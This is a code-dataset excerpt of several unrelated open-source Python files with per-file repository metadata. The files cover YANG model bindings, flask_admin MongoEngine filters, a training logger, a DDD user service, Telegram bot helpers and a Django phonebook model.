                        super(Grid.Nodes.Node.ClientXr.Client, self).__init__()

                        self.yang_name = "client"
                        self.yang_parent_name = "client-xr"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['client_name']
                        self._child_classes = OrderedDict([("client-data", ("client_data", Grid.Nodes.Node.ClientXr.Client.ClientData))])
                        self._leafs = OrderedDict([
                            ('client_name', (YLeaf(YType.str, 'client-name'), ['str'])),
                        ])
                        self.client_name = None

                        self.client_data = YList(self)
                        self._segment_path = lambda: "client" + "[client-name='" + str(self.client_name) + "']"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(Grid.Nodes.Node.ClientXr.Client, ['client_name'], name, value)

                    class ClientData(Entity):
                        """
                        Client information

                        .. attribute:: res_id

                            Resource ID

                            **type**\: int

                            **range:** 0..4294967295
                        """

                        _prefix = 'fretta-grid-svr-oper'
                        _revision = '2015-11-09'

                        def __init__(self):
                            super(Grid.Nodes.Node.ClientXr.Client.ClientData, self).__init__()

                            self.yang_name = "client-data"
                            self.yang_parent_name = "client"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('res_id', (YLeaf(YType.uint32, 'res-id'), ['int'])),
                            ])
                            self.res_id = None
                            self._segment_path = lambda: "client-data"
                            self._is_frozen = True

                        def __setattr__(self, name, value):
                            self._perform_setattr(Grid.Nodes.Node.ClientXr.Client.ClientData, ['res_id'], name, value)

            class Clients(Entity):
                """
                GRID Client Consistency Check

                .. attribute:: client

                    GRID Client Consistency Check

                    **type**\: list of :py:class:`Client <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.Clients.Client>`
                """

                _prefix = 'fretta-grid-svr-oper'
                _revision = '2015-11-09'

                def __init__(self):
                    super(Grid.Nodes.Node.Clients, self).__init__()

                    self.yang_name = "clients"
                    self.yang_parent_name = "node"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("client", ("client", Grid.Nodes.Node.Clients.Client))])
                    self._leafs = OrderedDict()

                    self.client = YList(self)
                    self._segment_path = lambda: "clients"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(Grid.Nodes.Node.Clients, [], name, value)

                class Client(Entity):
                    """
                    GRID Client Consistency Check

                    .. attribute:: client_name (key)

                        Client name

                        **type**\: str

                        **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+

                    .. attribute:: client_data

                        Client information

                        **type**\: list of :py:class:`ClientData <ydk.models.cisco_ios_xr.Cisco_IOS_XR_fretta_grid_svr_oper.Grid.Nodes.Node.Clients.Client.ClientData>`
                    """

                    _prefix = 'fretta-grid-svr-oper'
                    _revision = '2015-11-09'

                    def __init__(self):
                        super(Grid.Nodes.Node.Clients.Client, self).__init__()

                        self.yang_name = "client"
                        self.yang_parent_name = "clients"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = ['client_name']
                        self._child_classes = OrderedDict([("client-data", ("client_data", Grid.Nodes.Node.Clients.Client.ClientData))])
                        self._leafs = OrderedDict([
                            ('client_name', (YLeaf(YType.str, 'client-name'), ['str'])),
                        ])
                        self.client_name = None

                        self.client_data = YList(self)
                        self._segment_path = lambda: "client" + "[client-name='" + str(self.client_name) + "']"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(Grid.Nodes.Node.Clients.Client, ['client_name'], name, value)

                    class ClientData(Entity):
                        """
                        Client information

                        .. attribute:: res_id

                            Resource ID

                            **type**\: int

                            **range:** 0..4294967295
                        """

                        _prefix = 'fretta-grid-svr-oper'
                        _revision = '2015-11-09'

                        def __init__(self):
                            super(Grid.Nodes.Node.Clients.Client.ClientData, self).__init__()

                            self.yang_name = "client-data"
                            self.yang_parent_name = "client"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('res_id', (YLeaf(YType.uint32, 'res-id'), ['int'])),
                            ])
                            self.res_id = None
                            self._segment_path = lambda: "client-data"
                            self._is_frozen = True

                        def __setattr__(self, name, value):
                            self._perform_setattr(Grid.Nodes.Node.Clients.Client.ClientData, ['res_id'], name, value)

    def clone_ptr(self):
        # Replace the cached top entity with a fresh, empty Grid and return it.
        self._top_entity = Grid()
        return self._top_entity
| 37.814721 | 169 | 0.471441 | 1,379 | 14,899 | 4.775925 | 0.096447 | 0.049195 | 0.059217 | 0.056787 | 0.800486 | 0.773763 | 0.698148 | 0.666262 | 0.666262 | 0.665503 | 0 | 0.013251 | 0.422579 | 14,899 | 393 | 170 | 37.910941 | 0.752296 | 0.1782 | 0 | 0.619565 | 0 | 0 | 0.092986 | 0.015133 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103261 | false | 0 | 0.027174 | 0 | 0.195652 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4fbb0a2e350edc2f3b9bebc0899305ef16c85f16 | 7,873 | py | Python | venv/lib/python2.7/site-packages/flask_admin/contrib/mongoengine/filters.py | MarioAer/BubblesData | 849cc6428b5e8d64f5517f94a714e3f737bfc75d | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/flask_admin/contrib/mongoengine/filters.py | MarioAer/BubblesData | 849cc6428b5e8d64f5517f94a714e3f737bfc75d | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/flask_admin/contrib/mongoengine/filters.py | MarioAer/BubblesData | 849cc6428b5e8d64f5517f94a714e3f737bfc75d | [
"MIT"
] | null | null | null | import datetime
from flask_admin.babel import lazy_gettext
from flask_admin.model import filters
from .tools import parse_like_term
from mongoengine.queryset import Q
class BaseMongoEngineFilter(filters.BaseFilter):
    """
    Base MongoEngine filter.

    Concrete subclasses implement ``apply(query, value)`` to narrow a
    MongoEngine queryset and ``operation()`` to label the filter in the UI.
    """
    def __init__(self, column, name, options=None, data_type=None):
        """
        Constructor.

        :param column:
            Model field
        :param name:
            Display name
        :param options:
            Fixed set of options. If provided, will use drop down instead of textbox.
        :param data_type:
            Client data type
        """
        super(BaseMongoEngineFilter, self).__init__(name, options, data_type)

        # Kept so subclasses can build query keys from the field name.
        self.column = column
# Common filters
class FilterEqual(BaseMongoEngineFilter):
    """Match documents whose field equals the supplied value."""

    def apply(self, query, value):
        return query.filter(**{'%s' % self.column.name: value})

    def operation(self):
        return lazy_gettext('equals')
class FilterNotEqual(BaseMongoEngineFilter):
    """Match documents whose field differs from the supplied value."""

    def apply(self, query, value):
        return query.filter(**{'%s__ne' % self.column.name: value})

    def operation(self):
        return lazy_gettext('not equal')
class FilterLike(BaseMongoEngineFilter):
    """Substring/like match; the operator comes from parse_like_term."""

    def apply(self, query, value):
        op, needle = parse_like_term(value)
        return query.filter(**{'%s__%s' % (self.column.name, op): needle})

    def operation(self):
        return lazy_gettext('contains')
class FilterNotLike(BaseMongoEngineFilter):
    """Negated substring/like match."""

    def apply(self, query, value):
        op, needle = parse_like_term(value)
        return query.filter(**{'%s__not__%s' % (self.column.name, op): needle})

    def operation(self):
        return lazy_gettext('not contains')
class FilterGreater(BaseMongoEngineFilter):
    """Match documents whose field is strictly greater than the value."""

    def apply(self, query, value):
        return query.filter(**{'%s__gt' % self.column.name: value})

    def operation(self):
        return lazy_gettext('greater than')
class FilterSmaller(BaseMongoEngineFilter):
    """Match documents whose field is strictly less than the value."""

    def apply(self, query, value):
        return query.filter(**{'%s__lt' % self.column.name: value})

    def operation(self):
        return lazy_gettext('smaller than')
class FilterEmpty(BaseMongoEngineFilter, filters.BaseBooleanFilter):
    """Match documents whose field is (or is not) None, per the '1'/'0' form value."""

    def apply(self, query, value):
        # '1' means "is empty" -> equality with None; anything else negates it.
        key_template = '%s' if value == '1' else '%s__ne'
        return query.filter(**{key_template % self.column.name: None})

    def operation(self):
        return lazy_gettext('empty')
class FilterInList(BaseMongoEngineFilter):
    """Match documents whose field is one of a comma-separated list of values."""

    def __init__(self, column, name, options=None, data_type=None):
        # Force the tag-style widget regardless of the caller's data_type.
        super(FilterInList, self).__init__(column, name, options, data_type='select2-tags')

    def clean(self, value):
        """Split on commas, trim whitespace, and drop empty entries."""
        trimmed = (piece.strip() for piece in value.split(','))
        return [piece for piece in trimmed if piece]

    def apply(self, query, value):
        return query.filter(**{'%s__in' % self.column.name: value})

    def operation(self):
        return lazy_gettext('in list')
class FilterNotInList(FilterInList):
    """Match documents whose field is in none of the listed values."""

    def apply(self, query, value):
        return query.filter(**{'%s__nin' % self.column.name: value})

    def operation(self):
        return lazy_gettext('not in list')
# Customized type filters
class BooleanEqualFilter(FilterEqual, filters.BaseBooleanFilter):
    """Equality filter for boolean fields; the form posts '1'/'0'."""

    def apply(self, query, value):
        # Translate the string form value into a real bool before querying.
        return query.filter(**{'%s' % self.column.name: value == '1'})
class BooleanNotEqualFilter(FilterNotEqual, filters.BaseBooleanFilter):
    """Inequality filter for boolean fields; the form posts '1'/'0'."""

    def apply(self, query, value):
        # "not equal to '1'" is the same as "equal to the negation".
        return query.filter(**{'%s' % self.column.name: value != '1'})
# Concrete per-type filters. Each combines a generic MongoEngine query filter
# (defined above) with the value parsing/validation mixin from
# flask_admin.model.filters for the matching Python type; no extra behaviour
# is needed, hence the empty bodies.
class IntEqualFilter(FilterEqual, filters.BaseIntFilter):
    pass


class IntNotEqualFilter(FilterNotEqual, filters.BaseIntFilter):
    pass


class IntGreaterFilter(FilterGreater, filters.BaseIntFilter):
    pass


class IntSmallerFilter(FilterSmaller, filters.BaseIntFilter):
    pass


class IntInListFilter(filters.BaseIntListFilter, FilterInList):
    pass


class IntNotInListFilter(filters.BaseIntListFilter, FilterNotInList):
    pass


class FloatEqualFilter(FilterEqual, filters.BaseFloatFilter):
    pass


class FloatNotEqualFilter(FilterNotEqual, filters.BaseFloatFilter):
    pass


class FloatGreaterFilter(FilterGreater, filters.BaseFloatFilter):
    pass


class FloatSmallerFilter(FilterSmaller, filters.BaseFloatFilter):
    pass


class FloatInListFilter(filters.BaseFloatListFilter, FilterInList):
    pass


class FloatNotInListFilter(filters.BaseFloatListFilter, FilterNotInList):
    pass


class DateTimeEqualFilter(FilterEqual, filters.BaseDateTimeFilter):
    pass


class DateTimeNotEqualFilter(FilterNotEqual, filters.BaseDateTimeFilter):
    pass


class DateTimeGreaterFilter(FilterGreater, filters.BaseDateTimeFilter):
    pass


class DateTimeSmallerFilter(FilterSmaller, filters.BaseDateTimeFilter):
    pass
class DateTimeBetweenFilter(BaseMongoEngineFilter, filters.BaseDateTimeBetweenFilter):
    """Inclusive date-time range filter; the cleaned value is a (start, end) pair."""

    def __init__(self, column, name, options=None, data_type=None):
        # Force the range-picker widget regardless of the caller's data_type.
        super(DateTimeBetweenFilter, self).__init__(
            column, name, options, data_type='datetimerangepicker')

    def apply(self, query, value):
        start, end = value
        return query.filter(**{
            '%s__gte' % self.column.name: start,
            '%s__lte' % self.column.name: end,
        })
class DateTimeNotBetweenFilter(DateTimeBetweenFilter):
    """Complement of DateTimeBetweenFilter: outside the (start, end) range."""

    def apply(self, query, value):
        start, end = value
        # Outside the range means NOT >= start OR NOT <= end.
        before_start = Q(**{'%s__not__gte' % self.column.name: start})
        after_end = Q(**{'%s__not__lte' % self.column.name: end})
        return query.filter(before_start | after_end)

    def operation(self):
        return lazy_gettext('not between')
# Base MongoEngine filter field converter
class FilterConverter(filters.BaseFilterConverter):
    """
    Base MongoEngine filter field converter.

    Maps MongoEngine field type names (via the ``@filters.convert``
    registrations below) to the tuples of filter classes defined above.
    """
    # Filter sets grouped by broad value type.
    strings = (FilterLike, FilterNotLike, FilterEqual, FilterNotEqual,
               FilterEmpty, FilterInList, FilterNotInList)
    int_filters = (IntEqualFilter, IntNotEqualFilter, IntGreaterFilter,
                   IntSmallerFilter, FilterEmpty, IntInListFilter,
                   IntNotInListFilter)
    float_filters = (FloatEqualFilter, FloatNotEqualFilter, FloatGreaterFilter,
                     FloatSmallerFilter, FilterEmpty, FloatInListFilter,
                     FloatNotInListFilter)
    bool_filters = (BooleanEqualFilter, BooleanNotEqualFilter)
    datetime_filters = (DateTimeEqualFilter, DateTimeNotEqualFilter,
                        DateTimeGreaterFilter, DateTimeSmallerFilter,
                        DateTimeBetweenFilter, DateTimeNotBetweenFilter,
                        FilterEmpty)

    def convert(self, type_name, column, name):
        """Return the filter list for a field type name, or None if unknown."""
        # Registered converter keys are lower-case; match case-insensitively.
        filter_name = type_name.lower()

        if filter_name in self.converters:
            return self.converters[filter_name](column, name)

        return None

    @filters.convert('StringField', 'EmailField', 'URLField')
    def conv_string(self, column, name):
        return [f(column, name) for f in self.strings]

    @filters.convert('BooleanField')
    def conv_bool(self, column, name):
        return [f(column, name) for f in self.bool_filters]

    @filters.convert('IntField', 'LongField')
    def conv_int(self, column, name):
        return [f(column, name) for f in self.int_filters]

    @filters.convert('DecimalField', 'FloatField')
    def conv_float(self, column, name):
        return [f(column, name) for f in self.float_filters]

    @filters.convert('DateTimeField', 'ComplexDateTimeField')
    def conv_datetime(self, column, name):
        return [f(column, name) for f in self.datetime_filters]
| 29.486891 | 91 | 0.661247 | 792 | 7,873 | 6.449495 | 0.184343 | 0.064605 | 0.065779 | 0.043265 | 0.379013 | 0.35415 | 0.349843 | 0.310689 | 0.26527 | 0.26527 | 0 | 0.000666 | 0.236886 | 7,873 | 266 | 92 | 29.597744 | 0.849534 | 0.039629 | 0 | 0.355828 | 0 | 0 | 0.045982 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.202454 | false | 0.09816 | 0.030675 | 0.09816 | 0.644172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
4fbd1dca6b146e31dce08db94b6db986ccbaf877 | 52 | py | Python | cms/__init__.py | adaptivelogic/django-cms | b7a58b9700755c35b40c145ea81c5bad81271c61 | [
"BSD-3-Clause"
] | 1 | 2015-09-28T10:07:38.000Z | 2015-09-28T10:07:38.000Z | cms/__init__.py | adaptivelogic/django-cms | b7a58b9700755c35b40c145ea81c5bad81271c61 | [
"BSD-3-Clause"
] | null | null | null | cms/__init__.py | adaptivelogic/django-cms | b7a58b9700755c35b40c145ea81c5bad81271c61 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
__version__ = '2.4.0.beta'
| 13 | 26 | 0.538462 | 8 | 52 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 0.173077 | 52 | 3 | 27 | 17.333333 | 0.465116 | 0.403846 | 0 | 0 | 0 | 0 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
4fc473676345dd4cde3d8f8baaa727c48ac410b4 | 1,661 | py | Python | utils/tf_visualizer.py | NVlabs/UMR | 15ca8c87c158a238086ef01c9718c9c5773a6659 | [
"BSD-Source-Code"
] | 184 | 2020-09-11T20:35:10.000Z | 2022-03-30T04:26:23.000Z | utils/tf_visualizer.py | gengshan-y/UMR | d858c4ddd56bdac6e3342609f9c02618c279b990 | [
"BSD-Source-Code"
] | 14 | 2020-10-27T15:29:10.000Z | 2022-03-15T08:17:24.000Z | utils/tf_visualizer.py | gengshan-y/UMR | d858c4ddd56bdac6e3342609f9c02618c279b990 | [
"BSD-Source-Code"
] | 27 | 2020-09-13T09:04:25.000Z | 2022-01-21T08:10:41.000Z | # -----------------------------------------------------------
# Copyright (C) 2020 NVIDIA Corporation. All rights reserved.
# Nvidia Source Code License-NC
# Code written by Xueting Li.
# -----------------------------------------------------------
import numpy as np
import os
import ntpath
import time
import termcolor
# convert to colored strings
def _bold(content, color):
    """Render ``content`` as a bold, colored terminal string."""
    return termcolor.colored(str(content), color, attrs=["bold"])


def red(content):
    return _bold(content, "red")


def green(content):
    return _bold(content, "green")


def blue(content):
    return _bold(content, "blue")


def cyan(content):
    return _bold(content, "cyan")


def yellow(content):
    return _bold(content, "yellow")


def magenta(content):
    return _bold(content, "magenta")
class Visualizer():
    """Logs training scalars to stdout (colorized) and appends them to loss_log.txt."""

    def __init__(self, opt):
        self.log_name = os.path.join(opt.checkpoint_dir, opt.name, 'loss_log.txt')
        # Mark the start of a new training run in the (append-only) log file.
        with open(self.log_name, "a") as handle:
            stamp = time.strftime("%c")
            handle.write('================ Training Loss (%s) ================\n' % stamp)

    # scalars: same format as |scalars| of plot_current_scalars
    def print_current_scalars(self, epoch, i, scalars):
        """Print one formatted line of scalar values and append it to the log."""
        pieces = [green('(epoch: %d, iters: %d) ' % (epoch, i))]
        for key, val in scalars.items():
            # Learning rates get extra precision; everything else three decimals.
            template = '%s: %.6f ' if ("lr" in key) else '%s: %.3f '
            pieces.append(template % (key, val))
        line = ''.join(pieces)
        print(line)
        with open(self.log_name, "a") as handle:
            handle.write('%s\n' % line)
| 41.525 | 90 | 0.576159 | 207 | 1,661 | 4.541063 | 0.410628 | 0.082979 | 0.140426 | 0.185106 | 0.310638 | 0.310638 | 0.061702 | 0.061702 | 0.061702 | 0 | 0 | 0.004458 | 0.189645 | 1,661 | 39 | 91 | 42.589744 | 0.693908 | 0.20289 | 0 | 0.074074 | 0 | 0 | 0.129278 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.296296 | false | 0 | 0.185185 | 0.222222 | 0.518519 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 3 |
4fd9da13c9282a2262e37992365c35680ca51392 | 765 | py | Python | src/contexts/backoffice/users/application/createone/UserCreator.py | parada3desu/python-ddd-template | 3da506fbef07b18777e15301e8ba94cc314c6895 | [
"MIT"
] | 2 | 2022-02-26T14:09:43.000Z | 2022-03-13T08:48:21.000Z | src/contexts/backoffice/users/application/createone/UserCreator.py | parada3desu/python-ddd-example | 3da506fbef07b18777e15301e8ba94cc314c6895 | [
"MIT"
] | null | null | null | src/contexts/backoffice/users/application/createone/UserCreator.py | parada3desu/python-ddd-example | 3da506fbef07b18777e15301e8ba94cc314c6895 | [
"MIT"
] | null | null | null | from src.contexts.backoffice.users.domain.UserRepository import UserRepository
from src.contexts.backoffice.users.domain.entities.User import User
from src.contexts.backoffice.users.domain.entities.UserId import UserId
from src.contexts.backoffice.users.domain.entities.UserName import UserName
from src.contexts.shared.domain.EventBus import EventBus
class UserCreator:
    """Application service: create a User, persist it, then publish its domain events."""

    def __init__(self, user_repository: UserRepository, event_bus: EventBus):
        self.__repository = user_repository
        self.__bus = event_bus

    async def run(self, user_id: UserId, name: UserName):
        """Create and persist a user; events are published only after the write."""
        new_user: User = User.create(user_id, name)
        await self.__repository.create_one(new_user)
        await self.__bus.publish(new_user.pull_domain_events())
| 42.5 | 78 | 0.784314 | 100 | 765 | 5.75 | 0.32 | 0.06087 | 0.130435 | 0.173913 | 0.292174 | 0.292174 | 0.229565 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 765 | 17 | 79 | 45 | 0.86727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.384615 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
4fed4378e82a4d2469bfbbd100de96d4fb972645 | 1,258 | py | Python | bot/util.py | DukeX9/David-TelegramBot-Docker | 5269cde874b5d2082f5c38a86ada1f23943cb650 | [
"MIT"
] | null | null | null | bot/util.py | DukeX9/David-TelegramBot-Docker | 5269cde874b5d2082f5c38a86ada1f23943cb650 | [
"MIT"
] | null | null | null | bot/util.py | DukeX9/David-TelegramBot-Docker | 5269cde874b5d2082f5c38a86ada1f23943cb650 | [
"MIT"
] | null | null | null | from telegram import Chat, ParseMode, Update, Bot
from libs.mwt import MWT
class Utils:
    """Convenience wrapper around a telegram Bot plus the most recent Update."""

    # Most recent update; must be set via set_update before the accessors work.
    update: Update

    def __init__(self, bot: Bot):
        self.bot = bot

    def set_update(self, update):
        """Store the current update (also echoed to stdout for debugging)."""
        print("set_update {}".format(update))
        self.update = update

    def is_chat_private(self):
        """True when the current chat is a one-on-one conversation."""
        return self.get_chat().type == Chat.PRIVATE

    def is_user_admin(self):
        """True when the message sender is an administrator of the chat."""
        return self.update.message.from_user.id in self.get_admin_ids()

    @MWT(timeout=60 * 15)
    def get_admin_ids(self):
        """Fetch the chat's admin user ids (memoized by MWT for 15 minutes)."""
        members = self.bot.get_chat_administrators(self.update.message.chat_id)
        return [member.user.id for member in members]

    def is_chat_all_admins(self):
        """True when the group is configured so every member is an admin."""
        return self.get_chat().all_members_are_administrators

    def get_chat(self):
        return self.update.effective_chat

    def get_chatroom(self):
        return self.update.message.chat

    def get_message(self):
        return self.update.message

    def get_user(self):
        return self.update.effective_user

    def send_message(self, *args, **kwargs):
        """Send a message with HTML parse mode and a 20s timeout forced on."""
        kwargs['parse_mode'] = ParseMode.HTML
        kwargs['timeout'] = 20
        self.bot.send_message(*args, **kwargs)

    def matches_user_id(self, owner_id):
        """Compare the sender's id (as a string) against ``owner_id``."""
        return str(self.update.message.from_user.id) == owner_id
| 26.765957 | 105 | 0.674881 | 178 | 1,258 | 4.544944 | 0.275281 | 0.111248 | 0.121137 | 0.123609 | 0.269468 | 0.066749 | 0 | 0 | 0 | 0 | 0 | 0.006091 | 0.217011 | 1,258 | 46 | 106 | 27.347826 | 0.815228 | 0 | 0 | 0 | 0 | 0 | 0.023847 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.387097 | false | 0 | 0.064516 | 0.290323 | 0.806452 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
4fef1d2dae2567a7e1e13aace37be93707813b42 | 333 | py | Python | manage.py | hiporox/strawberry-django-plus | c648449034f43af8f94356820119d356f306110a | [
"MIT"
] | 44 | 2022-01-05T18:19:39.000Z | 2022-03-26T11:49:40.000Z | manage.py | hiporox/strawberry-django-plus | c648449034f43af8f94356820119d356f306110a | [
"MIT"
] | 29 | 2022-01-19T21:48:25.000Z | 2022-03-30T15:25:51.000Z | manage.py | hiporox/strawberry-django-plus | c648449034f43af8f94356820119d356f306110a | [
"MIT"
] | 5 | 2022-02-22T05:32:04.000Z | 2022-03-30T14:21:32.000Z | #!/usr/bin/env python3
"""Entrypoint for the demo app."""
import os
import sys
if __name__ == "__main__":
    # Defaults only: pre-existing environment variables take precedence.
    for key, value in {
        "_PERSISTENT_DB": "1",
        "DJANGO_SETTINGS_MODULE": "demo.settings",
    }.items():
        os.environ.setdefault(key, value)

    # Imported late so settings are configured before Django starts up.
    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)
| 23.785714 | 68 | 0.744745 | 45 | 333 | 5.111111 | 0.666667 | 0.078261 | 0.165217 | 0.191304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00692 | 0.132132 | 333 | 13 | 69 | 25.615385 | 0.788927 | 0.15015 | 0 | 0 | 0 | 0 | 0.209386 | 0.079422 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
4ff4d74d54ab18b0c0685dcb5f4806bf1e5ec710 | 545 | py | Python | tests/basics/bytes_compare3.py | geowor01/micropython | 7fb13eeef4a85f21cae36f1d502bcc53880e1815 | [
"MIT"
] | 7 | 2019-10-18T13:41:39.000Z | 2022-03-15T17:27:57.000Z | tests/basics/bytes_compare3.py | geowor01/micropython | 7fb13eeef4a85f21cae36f1d502bcc53880e1815 | [
"MIT"
] | null | null | null | tests/basics/bytes_compare3.py | geowor01/micropython | 7fb13eeef4a85f21cae36f1d502bcc53880e1815 | [
"MIT"
] | 2 | 2020-06-23T09:10:15.000Z | 2020-12-22T06:42:14.000Z | # Based on MicroPython config option, comparison of str and bytes
# or vice versa may issue a runtime warning. On CPython, if run as
# "python3 -b", only comparison of str to bytes issues a warning,
# not the other way around (while exactly comparison of bytes to
# str would be the most common error, as in sock.recv(3) == "GET").
# Update: the issue above with CPython apparently happens in REPL,
# when run as a script, both lines issue a warning.
if ("123" == b"123" or b"123" == "123"):
print("FAIL")
raise SystemExit
print("PASS") | 45.416667 | 67 | 0.711927 | 92 | 545 | 4.217391 | 0.652174 | 0.092784 | 0.07732 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031746 | 0.190826 | 545 | 12 | 68 | 45.416667 | 0.848073 | 0.8 | 0 | 0 | 0 | 0 | 0.196078 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 3 |
8b06b23189486abb08b18059d5099ddb818c14a2 | 1,057 | py | Python | popupforms/phonebook/models.py | edcodes/Django-PopUp-Forms | 4361b847efdff56d111e28afb38383905c4751e1 | [
"Apache-2.0"
] | 1 | 2022-03-15T14:21:26.000Z | 2022-03-15T14:21:26.000Z | popupforms/phonebook/models.py | edcodes/Django-PopUp-Forms | 4361b847efdff56d111e28afb38383905c4751e1 | [
"Apache-2.0"
] | null | null | null | popupforms/phonebook/models.py | edcodes/Django-PopUp-Forms | 4361b847efdff56d111e28afb38383905c4751e1 | [
"Apache-2.0"
] | null | null | null | from django.db import models
from django.contrib.auth.models import User
from django.urls import reverse
class PhoneBook(models.Model):
    """A phone-book entry tied to the user who created it."""

    # Required, indexed identity/contact fields.
    name = models.CharField(max_length=20, null=False, blank=False, db_index=True, verbose_name='Name')
    last_name = models.CharField(max_length=20, null=False, blank=False, db_index=True, verbose_name='Last Name')
    phone = models.CharField(max_length=20, null=False, blank=False, db_index=True, verbose_name='Phone Number')
    # Optional free-form details.
    address = models.CharField(max_length=200, null=True, blank=True, verbose_name='Address')
    email = models.CharField(max_length=100, null=True, blank=True, verbose_name='Email')
    note = models.CharField(max_length=100, null=True, blank=True, verbose_name='Note')
    # PROTECT: a user with entries cannot be deleted until they are removed.
    creator = models.ForeignKey(User, on_delete=models.PROTECT, verbose_name='Creator')

    class Meta:
        # Default queryset ordering by first name.
        ordering = ['name']

    def __str__(self):
        # NOTE(review): no separator between first and last name — confirm intended.
        return str(self.name) + str(self.last_name)

    def get_absolute_url(self):
        return reverse('phonebook-detail', kwargs={'pk': self.pk})
| 42.28 | 113 | 0.726585 | 150 | 1,057 | 4.953333 | 0.326667 | 0.103634 | 0.145357 | 0.193809 | 0.467026 | 0.467026 | 0.429341 | 0.429341 | 0.429341 | 0.429341 | 0 | 0.016593 | 0.144749 | 1,057 | 24 | 114 | 44.041667 | 0.80531 | 0 | 0 | 0 | 0 | 0 | 0.066288 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.176471 | 0.117647 | 0.941176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
8b0f1b26ccba9442f47816c46d70db223d3a7d42 | 42 | py | Python | temp.py | Aooyh/temp_pro | 2cd4b5533666bf987be34d65d4ca9d6cf9094deb | [
"MIT"
] | null | null | null | temp.py | Aooyh/temp_pro | 2cd4b5533666bf987be34d65d4ca9d6cf9094deb | [
"MIT"
